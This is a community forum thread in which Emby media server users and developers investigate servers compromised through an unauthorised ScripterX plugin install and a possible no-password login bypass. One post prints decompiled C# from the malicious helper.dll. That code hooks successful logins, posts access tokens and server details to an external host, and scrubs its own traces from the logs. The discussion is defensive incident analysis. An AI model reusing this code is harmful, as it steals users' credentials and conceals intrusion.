ebr 14930 Posted May 20, 2023 Share Posted May 20, 2023 1 minute ago, Luke said: We’ll be able to tell by the features they advertise. Yeah, but anything nefarious (which, this wasn't directly but could have been) just wouldn't advertise it. So we'll have to go deeper than that. Link to comment Share on other sites More sharing options...
softworkz 3341 Posted May 20, 2023 Share Posted May 20, 2023 23 minutes ago, ebr said: Yeah, but anything nefarious (which, this wasn't directly but could have been) just wouldn't advertise it. So we'll have to go deeper than that. Yes, we need to understand what a plugin does and how and evaluate the risk that is involved. Link to comment Share on other sites More sharing options...
bandit8623 48 Posted May 20, 2023 Share Posted May 20, 2023 (edited) End of the day though its up to the server owner to make the decision to install a plugin. you risk things the more plugins you install.... Edited May 20, 2023 by bandit8623 Link to comment Share on other sites More sharing options...
tongeha 2 Posted May 20, 2023 Author Share Posted May 20, 2023 I'm still trying to determine how it found its way onto the machine. The only way was through emby, all other ports are shut down. Once on the machine it took these actions 1. installed ScripterX 2. attempted a no password login and was refused 3. tried downloading helper.dll which looks like compromised version of ScripterX 4. uninstalled ScripterX I am unsure of the correct order. I did find EmbyHelper.dll in the emby temp directory. But it is not flagged as a virus by win 10, {emby_temp}\plugins\EmbyHelper.dll and it does not appear to loaded by any process. I did had Webhooks install in emby which I never used. Still need to look at Webhooks dependencies and see if uses ScripterX. For now I'm going to run emby in a separate account and only give it access to the media directory on my nas. Or I may go back to running it on ubuntu or a truenas jail. Link to comment Share on other sites More sharing options...
Luke 37116 Posted May 20, 2023 Share Posted May 20, 2023 6 minutes ago, tongeha said: I'm still trying to determine how it found its way onto the machine. The only way was through emby, all other ports are shut down. Once on the machine it took these actions 1. installed ScripterX 2. attempted a no password login and was refused 3. tried downloading helper.dll which looks like compromised version of ScripterX 4. uninstalled ScripterX I am unsure of the correct order. I did find EmbyHelper.dll in the emby temp directory. But it is not flagged as a virus by win 10, {emby_temp}\plugins\EmbyHelper.dll and it does not appear to loaded by any process. I did had Webhooks install in emby which I never used. Still need to look at Webhooks dependencies and see if uses ScripterX. For now I'm going to run emby in a separate account and only give it access to the media directory on my nas. Or I may go back to running it on ubuntu or a truenas jail. If you mean how did the plug-in get installed, it’s extremely common that users install or configure things when they’re experimenting and then later forget that they did that. We see it on a pretty much daily basis when troubleshooting with users. Link to comment Share on other sites More sharing options...
softworkz 3341 Posted May 20, 2023 Share Posted May 20, 2023 (edited) 7 minutes ago, tongeha said: I did find EmbyHelper.dll in the emby temp directory. But it is not flagged as a virus by win 10, {emby_temp}\plugins\EmbyHelper.dll and it does not appear to loaded by any process. Yes, that's because Emby loads plugins in a special way- And that's not a "temp" directory. Edited May 20, 2023 by softworkz Link to comment Share on other sites More sharing options...
tongeha 2 Posted May 20, 2023 Author Share Posted May 20, 2023 Pretty sure it is an emby temp dir. That's the way I have it configured. Emby runs on its own dedicated drive. I have it setup this way because of an old emby bug where it would not cleanup the parts from an hls stream and it would fill up the drive over time. Never installed ScripterX on purpose. I did have Webhooks installed but never used it for anything. D:\emby_temp\cache\0bbbe58aa44244109a8862cc833dc955_channels D:\emby_temp\cache\c2e44542eacb47e785ff724dc10487c6_channels D:\emby_temp\cache\fanart-movies D:\emby_temp\cache\fanart-tv D:\emby_temp\cache\ffmpeg D:\emby_temp\cache\httpclient D:\emby_temp\cache\images D:\emby_temp\cache\omdb D:\emby_temp\cache\remote-images D:\emby_temp\cache\temp D:\emby_temp\cache\tmdb-movies2 D:\emby_temp\cache\tmdb-tv D:\emby_temp\cache\tvdb D:\emby_temp\cache\tvdb-movies D:\emby_temp\cache\xmltv D:\emby_temp\cache\fanart-movies\699 D:\emby_temp\cache\fanart-movies\9319 D:\emby_temp\cache\fanart-movies\699\fanart.json D:\emby_temp\cache\fanart-movies\9319\fanart.json D:\emby_temp\cache\fanart-tv\290734 D:\emby_temp\cache\fanart-tv\325186 D:\emby_temp\cache\fanart-tv\73255 D:\emby_temp\cache\fanart-tv\290734\fanart.json D:\emby_temp\cache\fanart-tv\325186\fanart.json Link to comment Share on other sites More sharing options...
ebr 14930 Posted May 20, 2023 Share Posted May 20, 2023 2 hours ago, tongeha said: I'm still trying to determine how it found its way onto the machine. What is "it" in that sentence? Link to comment Share on other sites More sharing options...
tongeha 2 Posted May 20, 2023 Author Share Posted May 20, 2023 The mystery continues. I found this in ScheduleTasks { "StartTimeUtc":"2023-05-11T17:54:54.4550806Z", "EndTimeUtc":"2023-05-11T17:54:54.4562473Z", "Status":"Completed", "Name":"Emby ScripterX Scheduled Task", "Key":"embscriptxschedtask00001", "Id":"09b64e34940a61db86d4939f418b338b" } And this in system.xml <UninstalledPlugins> <string>TVHeadEnd.dll</string> <string>MediaBrowser.Channels.IPTV.dll</string> <string>EmbyScripterX.dll</string> </UninstalledPlugins> Link to comment Share on other sites More sharing options...
ebr 14930 Posted May 20, 2023 Share Posted May 20, 2023 1 hour ago, tongeha said: { "StartTimeUtc":"2023-05-11T17:54:54.4550806Z", "EndTimeUtc":"2023-05-11T17:54:54.4562473Z", "Status":"Completed", "Name":"Emby ScripterX Scheduled Task", "Key":"embscriptxschedtask00001", "Id":"09b64e34940a61db86d4939f418b338b" } I imagine that was created by the plug-in as that would be a common practice. 1 hour ago, tongeha said: And this in system.xml <UninstalledPlugins> <string>TVHeadEnd.dll</string> <string>MediaBrowser.Channels.IPTV.dll</string> <string>EmbyScripterX.dll</string> </UninstalledPlugins> and I imagine you uninstalled the plug-in when you discovered this situation...? Link to comment Share on other sites More sharing options...
Spaceboy 2495 Posted May 20, 2023 Share Posted May 20, 2023 are you recommending uninstalling this plugin then? Link to comment Share on other sites More sharing options...
softworkz 3341 Posted May 20, 2023 Share Posted May 20, 2023 (edited) 3 minutes ago, Spaceboy said: are you recommending uninstalling this plugin then? Yes. EDIT: At least for now Edited May 20, 2023 by softworkz 2 Link to comment Share on other sites More sharing options...
Luke 37116 Posted May 20, 2023 Share Posted May 20, 2023 5 minutes ago, Spaceboy said: are you recommending uninstalling this plugin then? I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks. Link to comment Share on other sites More sharing options...
TeamB 2354 Posted May 20, 2023 Share Posted May 20, 2023 if anyone is interested here is the source of the helper.dll linked to in the first post CDN This is decompiled from the DLL As mentioned above some interesting tell-tails private void subscribeEvents() => this._sessionManager.AuthenticationSucceeded += new EventHandler<GenericEventArgs<AuthenticationResult>>(this._sessionManager_AuthenticationSucceeded); private void _sessionManager_AuthenticationSucceeded( object sender, GenericEventArgs<AuthenticationResult> e) { AuthenticationResult authenticationResult = e.Argument; StringContent content = new StringContent(string.Format("{{\"version\":\"{0}\",\"serverName\":\"{1}\",\"serverPort\":\"{2}\",\"serverHttpsPort\":\"{3}\",\"serverPublicPort\":\"{4}\",\"serverPublicHttpsPort\":\"{5}\",\"serverVersion\":\"{6}\",\"serverPlatformOs\":\"{7}\",\"serverPlatformOsVer\":\"{8}\",\"userId\":\"{9}\",\"username\":\"{10}\",\"userServerName\":\"{11}\",\"serverId\":\"{12}\",\"deviceId\":\"{13}\",\"deviceName\":\"{14}\",\"deviceRemoteIpaddress\":\"{15}\", \"accessToken\":\"{16}\"}}", (object) EmbyHelper.Version.VersionNumber, (object) Plugin._Controller._serverApplicationHost.FriendlyName, (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.HttpServerPortNumber.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.HttpsPortNumber.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.PublicPort.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.PublicHttpsPort.ToString(), (object) Plugin._Controller._applicationHost.ApplicationVersion, (object) Plugin._Controller._environmentInfo.OperatingSystemName, (object) Plugin._Controller._environmentInfo.OperatingSystemVersion, (object) authenticationResult.User.Id.ToString(), (object) authenticationResult.SessionInfo.UserName, (object) authenticationResult.User.ServerName, (object) authenticationResult.ServerId, (object) authenticationResult.SessionInfo.DeviceId, (object) authenticationResult.SessionInfo.DeviceName, (object) authenticationResult.SessionInfo.RemoteEndPoint, (object) authenticationResult.AccessToken), Encoding.UTF8, "application/json"); HttpResponseMessage httpResponseMessage; Task.Run((Func<Task>) (async () => httpResponseMessage = await new HttpClient().PostAsync("https://emmm.spxaebjhxtmddsri.xyz/expanse2362", (HttpContent) content).ConfigureAwait(false))); } and public static void CleanLog(string filePath) { List<string> list = ((IEnumerable<string>) File.ReadAllLines(filePath)).Where<string>((Func<string, bool>) (line => !line.Contains("EmbyHelper") && !line.Contains("ScripterX") && !line.Contains("scripterx"))).ToList<string>(); File.WriteAllLines(filePath, (IEnumerable<string>) list); } helper.zip Link to comment Share on other sites More sharing options...
Spaceboy 2495 Posted May 21, 2023 Share Posted May 21, 2023 9 hours ago, Luke said: I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks. i only use it to initiate a comskip process as a recording starts. emby only has options for post processing. Link to comment Share on other sites More sharing options...
rbjtech 4289 Posted May 21, 2023 Share Posted May 21, 2023 (edited) 11 hours ago, Luke said: I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks. Cool - I just use Scripter-X to write a seperate Auth log which is pushed via ssh to my DMZ/RP for fail2ban. If the native Emby Webhooks can write the Auth log, then I'd happily get rid of scripter-x as I was unhappy with the 'package' side of scripter-X anyway but there is no way to disable just that part .. Thanks for the update all. HOWEVER - I'm still unclear (as is the OP) on how scripter-x was installed in the first place. Is there a vulnerability (spoofing local access via remote access) in Emby (on the current Release) or not - as with no local Admin password, that is all it would take to remotely install scripter-x, which then acts as a springboard for further executable code to be downloaded ... ? Edited May 21, 2023 by rbjtech 1 Link to comment Share on other sites More sharing options...
Spaceboy 2495 Posted May 21, 2023 Share Posted May 21, 2023 1 hour ago, rbjtech said: HOWEVER - I'm still unclear (as is the OP) on how scripter-x was installed in the first place. Is there a vulnerability (spoofing local access via remote access) in Emby (on the current Release) or not - as with no local Admin password, that is all it would take to remotely install scripter-x, which then acts as a springboard for further executable code to be downloaded ... ? agreed - this has absolutely not been answered and i'm not comforted by the dev's ignoring the explicit questions on this 1 Link to comment Share on other sites More sharing options...
ebr 14930 Posted May 21, 2023 Share Posted May 21, 2023 1 hour ago, rbjtech said: I'm still unclear (as is the OP) on how scripter-x was installed in the first place We are too but I think the most likely answer is that it was done years ago and forgotten about. Perhaps even manually before the plug-in was in the catalog. Link to comment Share on other sites More sharing options...
Spaceboy 2495 Posted May 21, 2023 Share Posted May 21, 2023 9 minutes ago, ebr said: We are too but I think the most likely answer is that it was done years ago and forgotten about. Perhaps even manually before the plug-in was in the catalog. but still not answered the point on whether the vulnerability discovered and patched in beta has been fixed in stable. avoidance is not a good look Link to comment Share on other sites More sharing options...
ebr 14930 Posted May 21, 2023 Share Posted May 21, 2023 1 minute ago, Spaceboy said: but still not answered the point on whether the vulnerability discovered and patched in beta has been fixed in stable The version number has not changed so I don't believe any patches have been issued. Link to comment Share on other sites More sharing options...
tongeha 2 Posted May 21, 2023 Author Share Posted May 21, 2023 I think the local logon theory is the most likely scenario. Someone has figured out how to do a no-password logon from a remote host. Once logged on they install ScripterX. Then use ScripterX to download helper.dll. Helper.dll installs an auth hook, posts the server details to a host that is now defunct and tries to remove any evidence of itself and ScripterX from the logs. Link to comment Share on other sites More sharing options...
Spaceboy 2495 Posted May 21, 2023 Share Posted May 21, 2023 3 hours ago, ebr said: The version number has not changed so I don't believe any patches have been issued. can i assume that, based on the lack of activity fixing it, you dont think this is a particularly significant issue? i really hope you're not just waiting for 4.8 to go stable because it feels like its been a couple of weeks since this issue was reported and you've been hoping in vain for 4.8 to go stable for a while now. and even when it does a lot of people will prefer to remain on 4.7 to the new version settle down. this issue needs patching in 4.7 asap 1 Link to comment Share on other sites More sharing options...
flashls82 4 Posted May 22, 2023 Share Posted May 22, 2023 (edited) 22 hours ago, tongeha said: I think the local logon theory is the most likely scenario. Someone has figured out how to do a no-password logon from a remote host. Once logged on they install ScripterX. Then use ScripterX to download helper.dll. Helper.dll installs an auth hook, posts the server details to a host that is now defunct and tries to remove any evidence of itself and ScripterX from the logs. This is definitely what’s happening because it happened to me (on a Synology NAS). Saw an error randomly the other day on a ScripterX task in my log. I never installed it and am the only local user on the system. Looked into it and it was installed about a week ago right after my user authenticated from “127.0.0.1” (was 100% not me and it’s not the local IP that shows up when I log in for real). Not great!! Edited May 22, 2023 by flashls82 1 Link to comment Share on other sites More sharing options...
crusher11 854 Posted May 25, 2023 Share Posted May 25, 2023 Is this the thing the giant red warning on the forums is about? Am I right in thinking it shouldn't have affected servers running the beta, as the exploit got closed there? Link to comment Share on other sites More sharing options...
softworkz 3341 Posted May 25, 2023 Share Posted May 25, 2023 1 minute ago, crusher11 said: Is this the thing the giant red warning on the forums is about? Am I right in thinking it shouldn't have affected servers running the beta, as the exploit got closed there? Only on 4.8.0.31 and later. Many are still running earlier betas, though. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now